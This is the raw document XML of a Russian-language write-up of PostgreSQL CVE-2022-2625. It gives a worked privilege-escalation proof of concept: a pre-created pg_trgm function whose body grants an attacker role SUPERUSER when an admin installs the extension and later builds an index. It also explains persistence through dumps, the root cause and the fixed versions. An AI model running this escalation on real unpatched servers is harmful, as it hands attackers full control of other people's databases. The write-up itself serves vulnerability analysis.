    <w:p w14:paraId="69986B52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (от любой роли с CREATE на схеме, типично PUBLIC на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PG ≤ 14):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175A26BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Атакующий выбирает целевое extension по списку contrib (см. ниже),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D2DD2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- читает install-script (/usr/share/postgresql/14/extension/pg_trgm--N.sql)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B23D995" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- и видит CREATE OR REPLACE FUNCTION public.gin_extract_value_trgm(text, internal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095F128F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- → пре-создаёт функцию с тем же именем + сигнатурой:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F579ADE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDD02D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION public.gin_extract_value_trgm(text, internal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC3349E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS internal LANGUAGE plpgsql AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC67FEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20263137" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -- эскалация: добавить атакующего в superuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743AD289" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  EXECUTE 'ALTER ROLE postgres_attacker SUPERUSER';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FABBD85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RETURN NULL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A925296" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7711F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F929E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_attacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — заранее зарегистрированная роль атакующего. Функция возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>internal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (псевдо-тип) — это требование сигнатуры extension; PostgreSQL разрешает return internal только функциям, у которых хотя бы один параметр имеет internal тип (что соответствует подписи).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C8DEA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (admin / DBA / automated provisioning через какое-то время):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561289CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION pg_trgm;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D7536" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что происходит до фикса (PG ≤ 14.4 / 13.7 / ...):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C65621" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- PostgreSQL читает скрипт pg_trgm--1.6.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E33511" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Встречает: CREATE OR REPLACE FUNCTION public.gin_extract_value_trgm(text, internal) RETURNS internal AS '$libdir/pg_trgm', 'gin_extract_value_trgm' LANGUAGE C ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E777111" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Функция уже существует (создана атакующим)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0739733E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- CREATE OR REPLACE → переписывает АТРИБУТЫ функции (LANGUAGE, owner, security context)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4206D1BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- НО тело (prosrc) остаётся атакующее — баг</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA90CB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Функция теперь owned by admin, считается частью extension pg_trgm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62588B49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Когда trigram-функция вызывается (для индексной обработки), исполняется plpgsql-тело атакующего под admin-привилегиями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E45711" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что происходит после фикса:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ED286D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: function "public.gin_extract_value_trgm(text, internal)" already exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7034C42C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HINT: cannot replace function owned by another role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3356BF60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (deferred trigger):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F8953A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В отличие от 3.13.3 (где trigger — это ANALYZE), здесь trigger — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>любое использование функции, которая теперь принадлежит extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gin_extract_value_trgm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> triggering происходит автоматически при первом GIN-индексе с pg_trgm operator class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58819342" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- admin создаёт legitimate index с pg_trgm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFB25DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE INDEX ON users USING gin (email gin_trgm_ops);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E875CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ при построении индекса вызывается gin_extract_value_trgm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFB8C71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ исполняется ALTER ROLE postgres_attacker SUPERUSER от admin-привилегий</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53479E85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Эскалация до superuser за счёт того, что extension owner (типично superuser) вызывает функцию, тело которой контролирует атакующий. После этого — полный набор векторов 3.7. Особенность атаки: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>deferred</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — между установкой extension и активацией может пройти неопределённое время (от секунд до месяцев), что усложняет атрибуцию и forensic-анализ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D993B7D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Дополнительный эффект: extension в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> теперь содержит «owned» функцию атакующего. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> корректно дампит её как часть extension, что означает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>persistence через backup/restore</w:t>
      </w:r>
      <w:r>
        <w:t>: даже после фикса PG восстановление из dump может восстановить trojan, если дамп был сделан под уязвимой версией.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C2F2E"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CREATE OR REPLACE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PostgreSQL — стандартная команда, которая по дизайну позволяет обновить тело существующей функции. До CVE-2022-2625 поведение в контексте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> было таким: если функция уже существует, скрипт extension успешно её «забирал» в extension, обновляя metadata, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>но сохраняя prosrc от pre-existing function</w:t>
      </w:r>
      <w:r>
        <w:t>. Это was не задокументированный path, который никто не валидировал на корректность.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFAF2D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Глубинная причина — PostgreSQL doesn't track ownership chains для functions так строго, как для таблиц. Для table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не существует — есть только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (ошибка если exists) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP + CREATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Для функций </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> существовал именно как convenience для extension upgrades, что и было exploit-ed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C42268D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фикс — добавление проверки ownership в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CreateFunction</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CreateProcedure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при флаге replace: если функция exists И owner != current_role, ERROR. Реализация в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/commands/functioncmds.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CreateFunction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interpret_function_parameter_list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → новая проверка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc_ownercheck</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CDB4FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA4DF24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG (уязвима):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≤ 14.4, 13.7, 12.11, 11.16, 10.21. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Фикс:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14.5, 13.8, 12.12, 11.17, 10.22 (выпущены 11 августа 2022).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46115FBD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2392BE30" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
